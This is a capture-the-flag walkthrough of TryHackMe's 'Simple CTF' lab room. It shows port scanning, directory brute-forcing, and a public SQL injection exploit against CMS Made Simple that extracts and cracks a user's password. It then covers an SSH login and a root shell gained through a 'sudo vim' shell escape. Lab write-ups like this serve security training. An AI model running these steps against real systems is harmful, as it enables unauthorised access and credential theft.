📝 TryHackMe. Walkthrough: Simple CTF
- The Site: TryHackMe
- Name room: Simple CTF
- Difficulty: Easy
How many services are running under port 1000?
$ nmap -A 10.10.203.52
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Answer: *
What is running on the higher port?
Answer: s**
What’s the CVE you’re using against the application?
Let’s try to brute the directories on the web server.
$ python3 dirsearch.py -u http://10.10.203.52/
...
[13:47:22] 200 - 929B - /robots.txt
[13:47:26] 301 - 313B - /simple -> http://10.10.203.52/simple/
In the directory /simple/
there is a website, the caption at the footer says that it runs on CMS Make Simple version 2.2.8
.
This site is powered by CMS Made Simple version 2.2.8
Trying to find available exploits through searchsploit.
$ searchsploit 'cms made simple 2.2'
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
$ searchsploit -m 46635
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script text executable, ASCII text
SQLi is good for us.
Answer: CVE-2019-****
To what kind of vulnerability is the application vulnerable?
Answer: sq**
What’s the password?
$ python 46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
$ python 46635.py -u http://10.10.203.52/simple/ --crack -w password-list-all.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
Where can you login with the details obtained?
With these credentials we can try to connect to SSH.
Answer: s*h
What’s the user flag?
Read the file in your home directory.
Answer: ***d **b, ke** u*!
Is there any other user in the home directory? What’s its name?
ls -la /home/
Answer: su****h
What can you leverage to spawn a privileged shell?
Let’s check what privileges we have for sudo
.
$ sudo --list
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
Answer: **m
What’s the root flag?
Get a root shell through sudo
.
sudo vim -c ':!/bin/sh'
And read the file with the flag in the /root/
directory.
Answer: W*** d***. **u **** ***